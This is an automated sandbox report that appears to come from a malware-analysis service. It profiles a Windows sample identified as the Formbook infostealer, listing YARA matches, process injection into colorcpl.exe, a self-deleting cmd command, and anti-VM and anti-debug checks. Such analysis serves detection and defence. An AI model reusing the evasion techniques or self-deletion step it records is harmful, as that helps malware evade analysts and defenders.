          Source: 00000000.00000002.222946934.00000000022F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.220049197.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.220049197.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.484311977.0000000001350000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.484311977.0000000001350000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.275240256.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.275240256.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.275382730.0000000000590000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.275382730.0000000000590000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.Nz7NA3F7z7.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.Nz7NA3F7z7.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Nz7NA3F7z7.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Nz7NA3F7z7.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Nz7NA3F7z7.exe.22f0000.2.unpack, type: UNPACKEDPE | Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Nz7NA3F7z7.exe.22f0000.2.unpack, type: UNPACKEDPE | Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.Nz7NA3F7z7.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.Nz7NA3F7z7.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Nz7NA3F7z7.exe.22f0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Nz7NA3F7z7.exe.22f0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Nz7NA3F7z7.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Nz7NA3F7z7.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/1@11/6
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 0_2_004042C1 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 0_2_73794225 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 0_2_00402053 CoCreateInstance,MultiByteToWideChar
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5676:120:WilError_01
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | File created: C:\Users\user\AppData\Local\Temp\nso7CE8.tmp
          Source: Nz7NA3F7z7.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\colorcpl.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\colorcpl.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | File read: C:\Users\user\Desktop\Nz7NA3F7z7.exe
          Source: unknown | Process created: C:\Users\user\Desktop\Nz7NA3F7z7.exe 'C:\Users\user\Desktop\Nz7NA3F7z7.exe'
          Source: unknown | Process created: C:\Users\user\Desktop\Nz7NA3F7z7.exe 'C:\Users\user\Desktop\Nz7NA3F7z7.exe'
          Source: unknown | Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
          Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Nz7NA3F7z7.exe'
          Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Process created: C:\Users\user\Desktop\Nz7NA3F7z7.exe 'C:\Users\user\Desktop\Nz7NA3F7z7.exe'
          Source: C:\Windows\SysWOW64\colorcpl.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Nz7NA3F7z7.exe'
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: colorcpl.pdbGCTL | source: Nz7NA3F7z7.exe, 00000001.00000002.275552180.0000000000670000.00000040.00000001.sdmp
          Source: Binary string: colorcpl.pdb | source: Nz7NA3F7z7.exe, 00000001.00000002.275552180.0000000000670000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Nz7NA3F7z7.exe, 00000000.00000003.217088763.0000000002980000.00000004.00000001.sdmp, Nz7NA3F7z7.exe, 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, colorcpl.exe, 00000007.00000002.485807292.0000000004EF0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Nz7NA3F7z7.exe, colorcpl.exe

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Unpacked PE file: 1.2.Nz7NA3F7z7.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: Nz7NA3F7z7.exe | Static PE information: real checksum: 0x0 should be: 0x3b1c6
          Source: eeysn2cunceh9.dll.0.dr | Static PE information: real checksum: 0xc0c7 should be: 0x2c828
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_004160D8 push ebp; ret 1_2_004160E6
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_0041C96C push cs; ret 1_2_0041C96D
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_0041B3B5 push eax; ret 1_2_0041B408
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_0041B46C push eax; ret 1_2_0041B472
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_0041B402 push eax; ret 1_2_0041B408
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_0041B40B push eax; ret 1_2_0041B472
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_0041C40D push esi; iretd 1_2_0041C40F
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_0041C485 push FFFFFFC3h; retf 1_2_0041C48D
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00415CA3 push edx; retf 1_2_00415CB3
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_0041CFC1 pushfd ; retf 1_2_0041CFC8
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_004187D8 push ss; ret 1_2_004187DB
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B8D0D1 push ecx; ret 1_2_00B8D0E4
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_1_004160D8 push ebp; ret 1_1_004160E6
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_1_0041C96C push cs; ret 1_1_0041C96D
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04F6D0D1 push ecx; ret 7_2_04F6D0E4
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_00DA60D8 push ebp; ret 7_2_00DA60E6
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_00DAC96C push cs; ret 7_2_00DAC96D
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_00DAB3B5 push eax; ret 7_2_00DAB408
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_00DABC84 push 00000056h; retf 7_2_00DABC86
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_00DAC485 push FFFFFFC3h; retf 7_2_00DAC48D
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_00DA5CA3 push edx; retf 7_2_00DA5CB3
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_00DAB46C push eax; ret 7_2_00DAB472
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_00DAB40B push eax; ret 7_2_00DAB472
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_00DAC40D push esi; iretd 7_2_00DAC40F
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_00DAB402 push eax; ret 7_2_00DAB408
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_00DABD57 push 00000062h; iretd 7_2_00DABD59
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_00DA87D8 push ss; ret 7_2_00DA87DB
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_00DACFC1 pushfd ; retf 7_2_00DACFC8
          Source: initial sample | Static PE information: section name: .data entropy: 7.27080116668
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | File created: C:\Users\user\AppData\Local\Temp\nso7CE9.tmp\eeysn2cunceh9.dll
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\colorcpl.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\colorcpl.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\colorcpl.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\colorcpl.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\colorcpl.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exe | RDTSC instruction interceptor: First address: 0000000000D985E4 second address: 0000000000D985EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exe | RDTSC instruction interceptor: First address: 0000000000D9897E second address: 0000000000D98984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_004088B0 rdtsc 1_2_004088B0
          Source: C:\Windows\explorer.exe TID: 5128 | Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\colorcpl.exe | Last function: Thread delayed
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 0_2_00405EC2 FindFirstFileA,FindClose,0_2_00405EC2
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 0_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004054EC
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 0_2_00402671 FindFirstFileA,0_2_00402671
          Source: explorer.exe, 00000003.00000000.240265075.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000000.240265075.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000003.00000000.233194998.0000000004DF3000.00000004.00000001.sdmp | Binary or memory string: c6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&A
          Source: explorer.exe, 00000003.00000000.239534327.0000000008220000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000003.00000000.240044494.0000000008640000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000002.495896761.0000000004DF3000.00000004.00000001.sdmp | Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&A
          Source: explorer.exe, 00000003.00000002.496492907.00000000055D0000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000003.00000000.240265075.000000000871F000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000003.00000000.240265075.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000000.240405437.00000000087D1000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000003.00000000.235243867.0000000005603000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000003.00000000.239534327.0000000008220000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000000.239534327.0000000008220000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000003.00000000.239534327.0000000008220000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\colorcpl.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_004088B0 rdtsc 1_2_004088B0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00409B20 LdrLoadDll,1_2_00409B20
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 0_2_737948E9 mov eax, dword ptr fs:[00000030h] 0_2_737948E9
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 0_2_737946E6 mov eax, dword ptr fs:[00000030h] 0_2_737946E6
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B6F0BF mov ecx, dword ptr fs:[00000030h] 1_2_00B6F0BF
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B6F0BF mov eax, dword ptr fs:[00000030h] 1_2_00B6F0BF
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B6F0BF mov eax, dword ptr fs:[00000030h] 1_2_00B6F0BF
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B620A0 mov eax, dword ptr fs:[00000030h] 1_2_00B620A0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B620A0 mov eax, dword ptr fs:[00000030h] 1_2_00B620A0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B620A0 mov eax, dword ptr fs:[00000030h] 1_2_00B620A0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B620A0 mov eax, dword ptr fs:[00000030h] 1_2_00B620A0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B620A0 mov eax, dword ptr fs:[00000030h] 1_2_00B620A0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B620A0 mov eax, dword ptr fs:[00000030h] 1_2_00B620A0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B790AF mov eax, dword ptr fs:[00000030h] 1_2_00B790AF
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B39080 mov eax, dword ptr fs:[00000030h] 1_2_00B39080
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BB3884 mov eax, dword ptr fs:[00000030h] 1_2_00BB3884
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BB3884 mov eax, dword ptr fs:[00000030h] 1_2_00BB3884
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B340E1 mov eax, dword ptr fs:[00000030h] 1_2_00B340E1
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B340E1 mov eax, dword ptr fs:[00000030h] 1_2_00B340E1
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B340E1 mov eax, dword ptr fs:[00000030h] 1_2_00B340E1
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B358EC mov eax, dword ptr fs:[00000030h] 1_2_00B358EC
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BCB8D0 mov eax, dword ptr fs:[00000030h] 1_2_00BCB8D0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BCB8D0 mov ecx, dword ptr fs:[00000030h] 1_2_00BCB8D0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BCB8D0 mov eax, dword ptr fs:[00000030h] 1_2_00BCB8D0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BCB8D0 mov eax, dword ptr fs:[00000030h] 1_2_00BCB8D0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BCB8D0 mov eax, dword ptr fs:[00000030h] 1_2_00BCB8D0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BCB8D0 mov eax, dword ptr fs:[00000030h] 1_2_00BCB8D0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B6002D mov eax, dword ptr fs:[00000030h] 1_2_00B6002D
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B6002D mov eax, dword ptr fs:[00000030h] 1_2_00B6002D
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B6002D mov eax, dword ptr fs:[00000030h] 1_2_00B6002D
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B6002D mov eax, dword ptr fs:[00000030h] 1_2_00B6002D
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B6002D mov eax, dword ptr fs:[00000030h] 1_2_00B6002D
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B4B02A mov eax, dword ptr fs:[00000030h] 1_2_00B4B02A
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B4B02A mov eax, dword ptr fs:[00000030h] 1_2_00B4B02A
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B4B02A mov eax, dword ptr fs:[00000030h] 1_2_00B4B02A
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B4B02A mov eax, dword ptr fs:[00000030h] 1_2_00B4B02A
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BB7016 mov eax, dword ptr fs:[00000030h] 1_2_00BB7016
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BB7016 mov eax, dword ptr fs:[00000030h] 1_2_00BB7016
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BB7016 mov eax, dword ptr fs:[00000030h] 1_2_00BB7016
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00C01074 mov eax, dword ptr fs:[00000030h] 1_2_00C01074
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BF2073 mov eax, dword ptr fs:[00000030h] 1_2_00BF2073
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00C04015 mov eax, dword ptr fs:[00000030h] 1_2_00C04015
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00C04015 mov eax, dword ptr fs:[00000030h] 1_2_00C04015
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B50050 mov eax, dword ptr fs:[00000030h] 1_2_00B50050
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00B50050 mov eax, dword ptr fs:[00000030h] 1_2_00B50050
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BB51BE mov eax, dword ptr fs:[00000030h] 1_2_00BB51BE
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BB51BE mov eax, dword ptr fs:[00000030h] 1_2_00BB51BE
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exe | Code function: 1_2_00BB51BE mov eax, dword ptr fs:[00000030h] 1_2_00BB51BE
